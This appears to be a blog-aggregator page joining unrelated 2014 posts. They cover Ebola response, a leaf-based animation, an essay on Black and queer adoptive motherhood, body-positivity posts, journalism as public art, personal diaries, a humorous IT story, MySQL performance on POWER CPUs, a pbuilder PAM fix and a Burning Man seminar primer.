    Ihekweazu says that he learned some important lessons in South Sudan that will be helpful this time around. For example, that the stark remoteness of isolation wards is a problem. “If you come to a place like this, it’s likely that you’re going to die there,” says Ihekweazu. “The cycle of anxiety keeps people away and keeps the outbreak spreading, because people stay home and infect their loved ones.” A big challenge now is convincing people to trust local hospitals in which they have “little confidence.”

    But there is a success story: the containment of Ebola in Lagos, Nigeria. When the first case of Ebola cropped up there, it spread to 13 people quickly. But then the spread stopped. An Ebola response center was quickly spun up.

    Thousand of people who’d had contact with patients were contacted and monitored carefully. It worked — there have only been 8 cases since.

    Anderson’s next question for Ihekweazu: At this late stage, can the world get this under control?

    “It can go either way. We could see a plateau in the next few months — which we hope for — or we could see a radical escalation,” says Ihekweazu. “It really depends on what we do in the next few weeks.”

    He feels encouraged as he sees the international community rallying to support the countries most affected by Ebola. “This is a challenge for our common global community — not just a problem for Liberia and Sierra Leone,” he says. “Whether it’s influenza in Mexico, or SARS in Hong Kong, or Ebola in Liberia, the boundaries we hold so dear are not respected by infectious diseases.”

    In Africa especially, governments need to step up. Ihekweazu points out that many hospitals and schools operate without running water, something he says is unacceptable. “How do we mobilize resources to deal with health, education, justice systems, to keep pace with development we’re seeing driven by the private sector across Africa?” he says. “We have a large economy, but it’s all private sector. Our public sector needs to step up.”

    The final question: What can people do to help?

    Ihekweazu stresses two things. First, that people support governments that are giving resources to fight this epidemic. And second, that they give money directly to Médecins Sans Frontières, or Doctors without Borders. “They know what to do — they’ve done it for years,” he says.


    TEDAn animated lesson full of adorable animals made of autumn leaves

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/KI7u_pcfAQE?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    Ten percent of plant matter gets eaten while it is alive. The other 90% falls to the ground and becomes detritus, which supports microbes, insects and, yes, us, as we feed on animals that grazed on it and plants that grow in it.

    When it came time to animate a TED-Ed lesson about this so-called “brown food chain,” the animation team of Celeste Lai, Lisa LaBracio and Biljana Labovic had an idea. LaBracio had a vast collection of dried leaves at home, and the trio conspired to create animals by layering these leaves into a visual representation of the idea that all living things are made up of dead matter.

    “I’ve had a collection of dried leaves and flowers since I was 8 or 9,” says LaBracio, who designed the backgrounds and animated the video. “I hunted for fallen leaves in my backyard and rescued dying bouquets to press between book pages. I’ve always found it fascinating that you can freeze a moment in time this way — and I’m taken with the different colors and patterns that emerge depending on how long a leaf has been on the ground. It’s pretty hard to get anywhere with me during the fall; I’m looking at the ground constantly, stopping every few seconds to grab something.”

    In the lesson above, these leaves become an owl, a fish, a grasshopper, a deer, a lion and a cow in a pasture. Lai, who was the character designer, says that she thoroughly enjoyed the puzzle of creating these animals out of LaBracio’s leaves.

    image

    image

    image

    image

    image

    image

    “The lion was the most fun to design. When I realized I could use pressed sunflower petals as the mane, I was ecstatic. Those shapes fit right into the animal design perfectly,” says Lai. “That magic also happened with the tail. I didn’t have to modify the leaf much — it just fit right in!”

    The hardest animal to create? That fish, says Lai. “It’s one of the simplest designs, but because a fish is shaped a lot like a leaf, finding the perfect one was hard,” she says. “I went through a few different designs with bigger or smaller leaves. But when I found the right leaf it became so simple.”

    For Labovic, who directed the lesson, the surprise was how well things fell into place once they’d picked their medium. “For every lesson, we try to challenge ourselves with something new — whether that be in the design or in the animation process,” she says. “At first, my idea was to use just the textures from the leaves, but when Lisa showed me a few little birds she had crafted from multiple leaves years before, I realized we could use 2-D puppet animation to bring the leaves to life.”

    LaBracio admits that she keeps many collections, some of which do come in handy for TED-Ed animations. “Many of Biljana’s and my collaborations feature things I ‘just have lying around.’ Recently, when we were making a video about honeybees, I remember saying, ‘Aww, man! I just threw out a bag of dead honeybees!’” she says. “Admittedly, my love of stop-motion animation has long justified my collecting. As a child, I loved showing my mom that there was a purpose to my jars of buttons and drawers of fabric scraps. And this project was a gift because it finally motivated me to digitally archive my favorite — and largest — collection.”

     For more unique animations, check out TED-Ed lessons »


    RacialiciousWho’s Your Mama?: Race, Sexuality, and the Adoptive Mother [Academic Essay]

    by Guest Contributor Sara M. Erdmann, MFA, PhD

    The image of the American adoptive mother has emerged gradually since adoption’s inception in 1851, but it has always existed within a racialized and heteronormative context (“Massachusetts Adoption of Children Act, 1851”).

    According to the American adoption narrative, adoptive mothers are white, heterosexual women; their decision to adopt a child is an act of goodwill, and, in cases of transracial adoption, even a badge of racial acceptance.

    This particular adoptive mother has become an accepted, albeit marginalized, part of mothering culture and is the one for whom books are written, organizations formed, and resources developed. This adoptive mother has defined the adoptive mother identity in modern America and become one of many voices within the larger motherhood narrative.

    Yet, research confirms that white, heterosexual women are not the only ones adopting children: many Black and queer (*) non-biological children, but, save for mentions in a few isolated academic texts, their experiences are almost entirely absent from the larger adoption narrative.

    Racism and homophobia are immediately identifiable causes of such exclusion: the powers of prejudice have an incalculable impact on the conversation surrounding non-biological motherhood. Indeed, the somewhat greater presence of Black and queer mothers in the blogosphere reinforces the fact that the elimination of mainstream publishing gatekeepers leads to an increase in diverse stories of motherhood.

    Still, while prejudice has led to innumerable obstacles for these two marginalized groups, it alone does not explain the relative dearth of print and online literature surrounding Black and queer adoptive motherhood. In fact, it is in part due to the history of these two groups and their engagement in non-normative forms of motherhood tha they are less visible and remain largely absent from discussions of modern adoptive motherhood.

    The community othermother has been recognized in African-American communities as an essential player in childrearing since the institution of slavery. In her essay “Mothering: A possible Black feminist link to social transformation?”, social scientist Stanlie M. James defines othermothers as “the women in African-American communities who assist blood mothers in the responsibilities in child care for short to long-term periods, in informal or formal arrangements” (45).

    While othermothers don’t have legal custody of the children they care for, it is impossible to quantify their level of commitment toward the children in their lives. In contrast to the biocentric views of parenthood prioritized in the white, heterosexual community, the informal adoption of non-biological children expands the “network of fictive kin” common within the Black community (James 45).

    Patricia Hill Collins, author of Black Feminist Thought, acknowledges that, while “grandmothers, sisters, aunts, and cousins” are among those who act as othermothers, many othermothers have no blood relationship with the children they care for (178). None of the othermothers Collins describes pursue legal adoption, nor do they intend to be permanent replacements for a child’s birth mother, which makes this “informal adoption” of “needy” or “orphaned” children difficult for western culture to understand (Collins 181). In the Black community, necessity and a shared sense of responsibility has made othermothers central to the raising of children, as they have allowed for children whose mothers were unable or unwilling to care for them fully to be fed, clothed, and educated without having to leave their community or seve ties to their biological mothers.

    This concept of children having more than one mother challenges the “one mother per child”, or monomaternalistic, mentality so rooted in American culture (Park 6). James observes that, “while western conceptualizations of mothering have often been limited to the activities of females with their biological offsprings,” a view that biologically prohibits co-mothering, “mothering within the Afro American community and the Black diaspora can be viewed as a form of cultural work” (44).

    What James describes—this view of mothering as cultural work—explicitly challenges biocentrism and further ensures that a child’s needs are being met within their own community.

    Indeed, Black othermothering is so prevalent that “young women are often groomed at an early age to become othermothers” (Collins), suggesting an expectation that the majority of women will take on some othermothering duties in their lifetime. Thus, the long-standing practice of African American othermothering has led Black women to view even traditional adoption and fostering differently and remains one of the fundamental reasons that Black women are largely absent in modern discussions of adoption.

    In her essay “Ain’t I a Mommy?,” Deesha Philyaw addresses the lack of Black voices in American motherhood narratives. Philyaw acknowledges racism’s substantive role, but also concedes that Black women may not be writing about motherhood in the same numbers in the first place: “If black women haven’t beaten down publishers’ doors with manuscripts about mothering or about pulling second shifts,” she writes, “it’s probably because this is what we’ve always done, without fanfare and without the luxury of ‘what about the children?’ pearl-clutching” (Philyaw).

    In other words, the market for Black motherhood memoirs is small in part because Black women either can’t or won’t buy into the guilt and angst that underlies most motherhood narratives. Simply put, Black women have been multitasking, working and raising their kids (and often other people’s kids as well) for hundreds of years, and they haven’t had the privilege of worrying (or writing) about the long term impact of their every decision.

    This causation can be broadened to include Black adoptive motherhood as well.

    Thorough research makes clear that there is very little concrete data surrounding black adoptive motherhood, so it’s difficult to know how many women’s experiences are being ignored by such a narrow focus, but blogger Adoptive Black Mom, author of an insightful yet rare blog on Black adoptive mothering, admits to feeling dismayed by “how few People of Color I see in adoption promotional media. We’re out here, but I think that the privilege of race frequently marginalizes us out of the adoption narrative” (“Privilege, Adoption, and Melissa Harris-Perry,” par. 17).

    In a community so accustomed to the work of raising one another’s children, the media and literary attention surrounding adoptive motherhood may not resonate in the same way with Black women.

    To write a memoir or create a formal organization geared toward adoptive mothering would suggest that one considers it a novel experience, when the communal act of child raising is so embedded in many African American communities that such formality is mystifying.

    Like Black othermothers, queer othermothers have been vital to childrearing, despite their relative invisibility within the larger adoption narrative. In fact, the history of their crucial but undocumented role has similarly contributed to their absence within the conversation surrounding adoption. In her anthology, Confessions of the Other Mother: Non-Biological Lesbian Moms Tell All, queer journalist Kathy Paige defines othermother as the non-biological co mother who may or may not have legal custody over her child.

    Historically, before the increasing availability of assisted reproductive technology (ART) in the 1990s allowed women to become pregnant without engaging in heterosexual sex, queer othermothers have had great investment in remaining invisible. Their invisibility was critical to queer biological mothers maintaining custody of their children during the second half of the twentieth century, as husbands and biological fathers could use a mother’s sexuality as justification for taking her children away (“Milestones in LGBT Parenting History”).

    While ART has allowed legally single women to become pregnant and has greatly lessened fear of losing custody to a male partner, the vast majority of states still deny queer women the right to marry and co- adopt, leaving them without even basic parental rights over children they raise from birth.

    Rather than receiving the legitimacy afforded to heterosexual adoptive mothers by legal and social systems already in place, queer othermothers are often viewed as outsiders or helpers, more like aunts than mothers, and this difference is reinforced by the fact that, like African American othermothers, they usually carry “no legal maternal status” (Park 79).

    Even in the most progressive of states, queer othermothers are required to spend thousands of dollars to legally adopt the children they planned for and their partners delivered, essentially becoming adoptive mothers even if they are married or partnered with the child’s birth mother for years prior to conception. Again, queer othermothers’ stories simply aren’t told within the adoptive community.

    Of course, unlike Black othermothers, queer othermothers don’t step in only to fill a gap in a child’s life. They aren’t there to provide services that a biological mother cannot or will not, nor is their place in their child’s life dependent on fluctuating needs.

    But it would be naïve to ignore the fact that all children gain different things from each parent, and that each parent acts in ways that complement another in hopes that all a child’s needs are met when all parents are considered. Furthermore, Black and queer othermothers share key characteristics: they challenge monomaternalism and reinforce the fact that children can and do thrive under the care of multiple mothers. They are also similarly disadvantaged by a society that prioritizes biological motherhood.

    And, unlike in cases of traditional adoption, neither Black nor queer othermothers compromise the biological mother’s place in their child’s life. The fact that Black and queer othermothers have for so long existed outside of “legal maternity” and have grown accustomed to being considered “secondary” parents provides partial explanation for their absence in conversations surrounding adoptive motherhood.

    Of course, even white, heterosexually married, middle-class adoptive mothers face challenges in their efforts to become a part of the motherhood narrative. Adoptive Black Mom allows that, “there’s just some stuff on this adoption journey that I think privilege can’t buffer. Make that a lot of stuff” (“Privilege, Adoption, and Melissa Harris-Perry,” par. 16).

    Our society’s dependence on biocentric visions of motherhood has long placed adoptive mothers on the periphery of maternity regardless of their race or sexuality. In her book Mothering Queerly, Queering Motherhood, Shelly M. Park explains that, “like light-skinned blacks or closeted queers, adoptive mothers know that we are ‘passing’” (24). Adoptive motherhood contradicts biocentrism, and adoption, Park concedes, “is [still] considered a ‘second-best’ solution to the problem of discovered infertility” (61). Still, this imperfect place on the “borderlands of maternity” (58) remains a visible one, largely unavailable to Black and/or queer women. These white, heterosexual adoptive mothers’ voices, while marginalized, are still heard.

    Writing is an act of resistance and activism, and it provides an outlet through which many white, heterosexual mothers might be able to share their stories. But for many Black women dealing with the profound inequalities of a racist society, “survival is a form of resistance” (Collins, 200). For Queer women, being called “mama” by their adopted child is activism. Books and blogs on Black and queer adoptive motherhood may never arrive in substantial numbers, both because of the silencing effects of racism and homophobia and also because the widespread history of othermotherhood has lessened its novelty, even to those involved in it.

    Lest it appear that the experiences of Black and queer women can be conflated, it’s important to distinguish between Black othermothers, who generally seek no legal rights, and queer othermothers, who often place great value on legal reinforcement of their parenthood in the rare cases where it’s available. Of course, Black, queer women face compounded struggles as mothers, othermothers, and adoptive mothers, and they have their own unique stories to tell. But both Black and queer othermothers aim to serve as additional, rather than replacement, mothers; both challenge the biocentric and monomaternal vision of motherhood, and also the racialized and heteronormative visions of adoptive motherhood.

    The history of othermothering in Black and queer communities does not justify the absence of Black and queer adoptive mothers within the larger adoption narrative. Rather, it serves to complicate the understanding of their absence.

    The media plays a profound role in raising awareness of the struggles of marginalized groups, and whether it be access to social services that allow children to remain with othermothers within their community or affordable access to legal adoption for queer othermothers, giving othermothers and non-normative adoptive mothers a voice will increase the safety and stability of adoptive families everywhere.

    Sara Erdmann earned her PhD in literature and creative writing in 2013. She teaches English at an all-girls boarding school in Connecticut, where she writes fiction and reads obsessively about issues affecting women worldwide. You can follow her on Twitter at @smerdmann.

    Works Cited

    Collins, Patricia Hill. Black Feminist Thought: Knowledge, Consciousness, and the Politics of Empowerment. City: Publisher, Year. Print.

    “Massachusetts Adoption of Children Act, 1851.” The Adoption History Project.

    University of Oregon, 2012. Web. 18 March 2014. http://pages.uoregon.edu/adoption/

    archive/MassACA.htm

    “Milestones in LGBT Parenting History.” Mombian.com, 2014. Web. 18 March 2014.

    http://www.mombian.com/2012/10/30/milestones-in-lgbt-parenting-history/

    Paige, Kathy. Confessions of the Other Mother: Non-Biological Lesbian Moms Tell All.

    Park, Shelley M. Mothering Queerly, Queering Motherhood. City: SUNY Press, 2014.

    Print.

    James, Stanlie M. “Mothering: A possible Black feminist link to social transformation?”

    Theorizing Black Feminisms: The Visionary Pragmatism of Black Women. Ed. Stanlie M.

    James and Abena P. A. Busia. City: Routledge, 1993. Ppgs. Print.

    The post Who’s Your Mama?: Race, Sexuality, and the Adoptive Mother [Academic Essay] appeared first on Racialicious - the intersection of race and pop culture.

    Sociological Images10 Honest Thoughts on Being Loved by a Skinny Boy

    Today is Love Your Body Day and is this is our favorite body positive post of the year, re-posted in celebration. 

    Rachel Wiley delivers a provocative poem about her experience as a “fat girl” loved by a skinny boy.  My favorite part:

    My college theater professor once told me
    that despite my talent,
    I would never be cast as a romantic lead.
    We put on shows that involve flying children and singing animals
    but apparently no one
    has enough willing suspension of disbelief
    to buy anyone loving a fat girl.

    Watch the whole thing (transcript here):

    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" height="315" width="560"><param name="allowFullScreen" value="true"/><param name="allowscriptaccess" value="always"/><param name="src" value="//www.youtube.com/v/tRFOTqTicvY?version=3&amp;hl=en_US"/><param name="allowfullscreen" value="true"/><embed allowfullscreen="true" allowscriptaccess="always" height="315" src="//www.youtube.com/v/tRFOTqTicvY?version=3&amp;hl=en_US" type="application/x-shockwave-flash" width="560"></object>

    If you liked, we also recommend Kara Kamos’ confession that she’s ugly, but can’t think of a good reason to care.  Hat tip to Polly’s Pocket.

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    Sociological ImagesLove Your Body Day: Hall of Fame and Shame

    It’s Love Your Body day!  Below is a Hall of Fame and a Hall of Shame.  The second set of posts reveal just what we’re up against, but the first set is a salve, a celebration of all of our beautifully diverse and interesting bodies.

    You choose what will amp you up today,  but don’t miss this year’s SocImages Pick: Rachel Wiley offers 10 Honest Thoughts About Being Loved by a Skinny Boy.

    The Hall of Fame

    Disability
    Body Types
    Gender
    Race/Ethnicity/Color

    The Hall of Shame

    Body Types
    Hair
    Transsexuality
    Heightism
    Disability

     

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    Racialicious#GIA14: Journalism as Public + Art

    I’m on the road still – currently in Houston at the Grantmakers in the Arts 2014 Conference in Houston, Texas. This year’s conference will focus on grantmaking, race, and social justice, so I will be blogging from the conference for the next few days about issues pertinent to artists of color.

    I’m speaking at the Monday morning plenary, on how the future of journalism is looking more and more like public art. Here’s a cleaned up version of my talk. – LDP

    What is the future of journalism? The increasingly terrifying answer is that no one truly knows – in a time of budget cuts and a shifting media environment, it would be all too simple to despair. But in times of great turmoil we see some of the greatest forms of inspiration. In the media world, we are beginning to redefine what journalism is and what journalism can be. What is journalism, but a way of informing the public? What is art, but the expression of ideas made public? And what happens when the walls between the two start to fall?

    Early experiments show a need for journalism to leap off the page, phone, and tablet and into other types of spaces. The “Reveal” project from the New York Times R & D lab, placed news, weather, and biometric data like a users weight and heart rate into a tricked out mirror.

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/pZkdSqueU-I" width="560"></iframe>

    The team started this project to “to explore how the relationship between information and the self is evolving.” So information moved from pages to personalized surfaces. But where else?

    In response to the ongoing debates around net neutrality, activists from Fight for the Future took the story to the streets. Erecting a billboard and speakers, they blared John Oliver’s 15 minute monologue around the FCC to the front doors of the building – alerting passerby to both the story and the need for action.

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/fpbOEoRrHyU" width="560"></iframe>

    But how else can we transport a story?

    The MIT Media Lab grew a small experiment into an interactive art display, where even the spokes of a bike passing you on the street can deliver a message and tell a story.

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/z0eoxaZiEic" width="560"></iframe>

    Don’t be fooled by the grand look of many of these projects. The reason these types of innovation in journalism is possible is due to the change in consumer technology.

    My Knight Project at Stanford focused on creating interactive public spaces with the most powerful tools already we can fit into pockets. And with a few small additions, you can create a mobile interaction space with tools that fit in your back pack. With sensors like the Kinect, bluetooth speakers and mini projectors, a story can live anywhere.

    The mobile projection kit. Photo by Sam Stewart.

    The mobile projection kit. Photo by Sam Stewart.

    Like here – Luminous Intervention, an activist group in Baltimore had a major idea: to draw attention to the growing number of people without shelter. The simple solution? To project people under this road where drivers and passerby could see it.

    Luminous Internventions

    Luminous Internventions

    Raising awareness, and making a public statement was not limited to an op-ed or a flyer. The statement – and the story – became part of the visual environment.

    We can also foster community reactions to popular news stories. This image, also from Luminous Interventions, took the Occupy Movement and put it on the streets of Baltimore, in an accessible way to spark community dialogue and conversation. There was no need for people to go anywhere to engage – the conversation happened in their streets, on their block.

    Luminous Intervention

    Luminous Intervention

    And most recently, in St. Louis, Missouri, activists have used their cell phones and projections to take the news to city hall – literally. Kajieme Powell was shot and killed by police officers, within the same month as Michael Brown’s death in Ferguson, Missouri. Here , citizens ensured that this event was on the was not forgotten by looping the video.

    <script async="async" charset="utf-8" src="http://platform.twitter.com/widgets.js"></script>

    My friend and co-fellow Mariam Seeman urged journalists to adopt a new framework for reporting – to go from storytelling to storyliving:

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/bJEedgkLYOE" width="560"></iframe>

    This action is how we live a story.

    To move story living even further, journalist and artist Nonny De La Pena creates what she calls immersive journalism experiences. She hacked together virtual reality kit using an open source video game platform called Unity. From that base,she’s been able to explore a multitude of news stories – and picked up an Indiecade impact award this weekend for changing the expanding the scope of games. She’s explored issues like Hunger in Los Angeles and the experiences of prisoners in Guantanamo bay. One of her latest projects focuses on Syria – let’s experience a little of what de la Pena creates:

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/HtZrSb84JPE" width="560"></iframe>

    And with the advent of personal virtual reality technology, like Oculus Rift, these types of complex experiences will be soon be seen in the comfort of your own home.

    One of the final elements of storyliving is social exchange. While most understand the need for social media as a way of promoting work, there is still so much potential in creating multifaceted stories with varying narratives in real time. The Question Bridge project, from Hank Willis Thomas and Chris Johnson does just that – by using devices like iPads and phones to allow viewers to see the project, ask a question, and record their own responses, becoming part of the conversation in a way that’s deeper than an interview filtered through a third party.

    <iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/kNartlSyA1s" width="560"></iframe>

    These were just a few of the many ideas influencing journalism right now. But it’s easy to see that the most interesting aspects of journalism’s evolution looks a lot like art – putting ideas, people, and the public first. Thank you.

    The post #GIA14: Journalism as Public + Art appeared first on Racialicious - the intersection of race and pop culture.

    Planet Linux AustraliaAndrew Pollock: [life] Day 258: Kindergarten, demonstrations and play dates

    I had my second Thermomix demonstration this morning. It was a decent drive from home away, and in my thoroughness to be properly prepared, I somehow managed to misjudge the time and arrived an hour earlier than I needed to. Oops.

    It was good to have the additional time up my sleeves though, and I was happy with how the demonstration went, and it left me with a comfortable amount of time to get to Kindergarten to pick Zoe up. It did completely wipe out the day though.

    Zoe wanted to watch Megan's tennis class, so I left her with Jason while I popped home to get changed, and then came back in time for the conclusion of tennis class.

    Zoe wanted Megan to come over for a play date, so I took Megan back to our place, and the girls had a great afternoon on the balcony doing some self-directed craft. I used the time to play catch up and make a bunch of phone calls.

    It wasn't until after Sarah picked up Zoe that I realised I'd barely interacted with her all afternoon though, which was a bit of a shame. I'll be happy once this sausage sizzle on Saturday is done, and the pace of life should slow down a bit more again.

    It was a bit of a struggle to force myself to go to yoga class tonight, but I'm glad I did, because it was a really great class.

    Planet Linux AustraliaAndrew Pollock: [life] Day 257: Kindergarten, meetings, and scrounging for sausages

    Zoe's Kindergarten has scored the fundraising sausage sizzle rights to the local Councillor's next Movies in the Park event. Since I've been the chairperson of the PAG, which doesn't seem to actually involve much other than being cheerleader in chief and chairing monthly meetings, I thought I'd lend the fundraising committee a hand with the organising of this event. The fundraising committee have worked their butts off this year.

    After I dropped Zoe at Kindergarten, I want to the home of one of the committee members and met with the committee to discuss logistics for the upcoming sausage sizzle. I'd previously volunteered to try and get a donation of sausages from a local butcher, but hadn't had a chance to do that yet.

    After taking a bus into the city and back for a lunch meeting, and picking up Zoe from Kindergarten afterwards, we set out on a tour of all the local supermarkets and butchers, with an official letter in hand from the Kindergarten.

    We were unlucky on all fronts, but Zoe did score a free cheerio at one butcher, so she was pretty happy. Driving all over the place ate up most of the afternoon.

    Anshu dropped in after work not long after we got home, and then Sarah arrived not long after that to pick up Zoe.

    CryptogramSurveillance in Schools

    This essay, "Grooming students for a lifetime of surveillance," talks about the general trends in student surveillance.

    Related: essay on the need for student privacy in online learning.

    Worse Than FailureBazooka Proof

    Back in early 2000, Clint interviewed for a position as a software developer for a mid-sized engineering company of about 200-plus people somewhere in the deserts of Kerblekistan, located in very close proximity to the Elbonian mud fields. Everyone there, especially the women, was used to living in harsh conditions, and had grown extremely rugged as a result. The Kerblekistanis and Elbonians had been enjoying an uneasy peace, but kept a wary eye out for less-than-peaceful activities...

    During the interview, the development team was ready to hire him when one of the bosses burst into the room and interrupted the interview to introduce himself. When he discovered that Clint had an IT background, he became very excited. They temporarily needed a network administrator until they could hire someone permanently, so for the first three months, Clint was assigned to be a network admin.

    To further complicate things, the team was moving to a new office. Two new network administrators were hired, one of which Clint had worked with elsewhere. Since both had extensive experience in managing office moves, they were given the task of continuing to coordinate that, while Clint maintained the day to day network tasks. Since the new guys would ultimately be running the network, he gave them the luxury of modifying some of the plans to suit themselves.

    A few weeks before the move when it was time to get the communications set up, there arose a heated debate between the two admins about where to set up the servers.

    The new office had two floors. On the lower floor, a receptionist who was built like a tank and could have single handedly replaced the Pittsburgh Steel Curtain, sat directly in front of the main entrance. She was the secretary, receptionist and security. Right behind her was a large air conditioned area where power and communications came into the building. Directly above this room was a small office without any special A/C, power or communications set-ups, which was to be the administrators' office. Before the two admins were hired, Clint had placed several server racks in the big room downstairs.

    Both new admins had installed the racks, but new admin B was not happy; he wanted the server racks to be installed in the small room on the second floor (the new IT office). Admin A wanted them left downstairs where they were already located because the small office upstairs was barely big enough for two people, let alone several racks of noisy servers, plus A/C that would have to be added.

      Admin-B: We can't have these racks downstairs; what if the Elbonians attack 
               through the front door?
      Admin-A: The receptionist is in front of the door, and nobody gets 
               past her without a pass!
      Admin-B: These racks need to be upstairs; this way if the server room is 
               destroyed, they'll be safe - with us
      Admin-A: If the room downstairs blows up, what makes you think we will survive 
               directly above it? Besides, how much damage can a wad of mud really do?
      Admin-B: But they've been ramping up their weapons and supplies; we need to be ready!
      ...
    

    The debate was still raging when Clint arrived at the new office with two owners of the company (one Elbonian, one Kerblekistani) in tow, to check on things. Neither admin noticed Clint or the owners walk in.

      Admin A: There is no security issue. These doors are solid and they lock!
               The servers are not going to be any more secure on the second floor.
      Admin B: (sounding like a belligerent child)
               Yes, but those doors are not bazooka-proof. The owners are Elbonian 
               and Kerblekistani - you never know what might happen!
    

    Rather than take offence, both owners decided to have some fun with the situation...

      Owner E: Our mud-bombs could certainly penetrate this door!
      Owner K: Perhaps, but you'll never get them past my secretary - 
               Nothing gets past her - NOTHING!
      Admin A: Um, what the f...?!
      Admin B: Now do you see why we need to keep these servers upstairs?
      Owner E: I am positive our new Mud-a-Pult™ has both the range and 
               power to penetrate the upstairs office
      Owner K: Then I suppose I'll have to call up the reserves from the office pool
               to back up my secretary
      Admin B: (sounding significantly less belligerent)
               W..W..Wait - are you serious?
    

    As the owners wandered away while pretending to still argue, Clint brokered a compromise where only the rack with the more important mission-critical servers was to be located in the upstairs office, safe from the mud-people. The other servers would stay in the server room, protected by the locked door, and the receptionist, who thankfully would never know that she was the first line of defense.

     

    <pphoto credit:="credit:">Foter / CC BY

    Debian Administration Setting up your own graphical git-server with gitbucket

    This article documents the process of configuring a git host, using gitbucket, which will give you a graphical interface to a collection of git repositories, accessible via any browser, along with support for groups, issues, and forks.

    Planet Linux AustraliaLev Lafayette: Linux and Windows 8 Dual Boot : A Brief How-To

    As regular readers would know, I make some effort to avoid using closed-source and proprietary software. This includes that popular operating system common on laptops and servers, MS-Windows. However there are a small number of reasons why this O.S. is required, including life-saving medical equipment hardware which, for some unfathomable reason, has been written to only interface with proprietary operating systems. Open source developers?

    read more

    Planet Linux AustraliaStewart Smith: MariaDB Foundation board

    There seems be a bit of an exodus from the MariaDB Foundation board recently… I’m not sure exactly what to make of it all, but the current members according to https://mariadb.org/en/foundation/ are:

    • Rasmus Johansson (chair)
    • Michael “Monty” Widenius
    • Jeremy Zawodny
    • Sergei Golubchik

    With Jeremy Zawodny being the only non-MariaDB Corp member.

    Recently, Jeremy Cole asked some people about their membership:

    I’m a little worried for the project, the idea of a foundation around it and for people I count as friends who work on MariaDB.

    Planet Linux AustraliaStewart Smith: MySQL 5.7.5 on POWER – thread priority

    Good news everyone!

    MySQL 5.7.5 is out with a bunch more patches for running well on POWER in the tree. I haven’t yet gone and tried it all out, but since I’m me, I look at bugs database and git/bzr history first.

    On Intel CPUs, when you’re spinning on a spin lock, you’re meant to execute the PAUSE CPU instruction. This tells the CPU that other execution threads in the same core should be given priority as you are currently not doing anything productive. Without this, you’re likely going to hurt on hyperthreaded CPUs.

    In MySQL, there are custom spinlocks in order to do interesting adaptive mutex things to attempt to squeeze the most performance possible out of modern systems.

    One of the (not 100% ready, but close) bugs with patches I submitted against MySQL 5.7 was for using the equivalent of the PAUSE instruction for POWER CPUs. On POWER, we’re a bit different, you can actually set priorities of threads (which may matter more, as POWER8 CPUs can be in SMT8 mode – where there are *eight* executing threads per core).

    So, the good news is that in MySQL 5.7.5, the magic instructions for setting thread priority are in! This should mean great things for performance on POWER systems with any of the SMT modes enabled.

    The next interesting part of this is how it interacts with other KVM guests on a system. At least on POWER (and on x86 as well, although I won’t go into details here) there’s a hypervisor call that a guest can make saying “hey, I’m spinning here, perhaps you want to make sure other vcpus execute so that at some point I can continue”. On POWER, this is the H_CONFER hcall, where you can basically do a directed yield to another vcpu (the one that holds the lock you’re trying to get is a good idea).

    Generally though, it’s only the guest kernel that does this, not userspace. You can see the H_CONFER call in __spin_yield(arch_spinlock_t*) and __rw_yield(arch_rwlock_t*) in arch/powerpc/lib/locks.c in the kernel.

    It would be interesting to see what extra we could get out of a system running multiple guests with MySQL servers if InnoDB/MySQL could properly yield to the right vcpu (well, thread I guess).

    ,

    Planet DebianPhilipp Kern: pbuilder and pam_tmpdir

    It turns out that my recent woes with pbuilder were all due to libpam-tmpdir being installed (at least two old bug reports exist about this issue: #576425 and #725434). I rather like my private temporary directory that cannot be accessed by other (potential) users on the same system. Previously I used a hook to fix this up by ensuring that the directory actually exists in the chroot, but somehow that recently broke.

    A rather crude but working solution seems to be "session required pam_env.so user_readenv=1" in /etc/pam.d/sudo and "TMPDIR=/tmp" in /root/.pam_environment. One could probably skip pam_tmpdir.so for root, but I did not want to start fighting with pam-auth-update as this is in /etc/pam.d/common-session*.

    LongNowLarry Harvey Seminar Primer

    On Monday, October 20th, Larry Harvey speaks for Long Now on “Why The Man Keeps Burning,” as part of our monthly Seminars About Long-term Thinking. Each month the Seminar Primer gives you some background about the speaker, including links to learn even more.

    Burning Man started with humble beginnings in 01986 with 20 people on a beach. Twenty-eight years later, it’s one of the premiere arts festival in the country, with over 66,000 people attending annually, dozens of satellite events, and a vibrant international community. In one sense, Burning Man is an event that only happens for one week per year in a remote desert in Nevada. In another sense, it’s a massive global phenomenon that supports thousands of artists, causes, and technologies.

    What sets Burning Man apart from other large-scale festivals is its focus on participation. The organizers set up the infrastructure of “Black Rock City” (including roads, portapotties, ice, DMV, medical, post offices, etc.) and then attendees become the citizens and bring life to the desert through hundreds of art pieces, mutant vehicles, and theme camps. This personal investment of time, money and creativity by participants far exceeds what the the festival organizers could do if they were planning the Burning Man event in the traditional sense.

    How does something as outrageous as a temporary city of art built in the middle of the desert come about? It all began on a small beach in San Francisco and an “event” organized by Larry Harvey and a group of his artist, prankster friends. In 01986 the first wooden figure they built was only 8-feet tall. The attendees were all members of the San Francisco Cacophony Society, a group of artists and mischief makers also associated with Santarchy, urban exploration, and Art Cars. The beach version of Burning Man became an annual event, but was subsequently shutdown by local authorities.

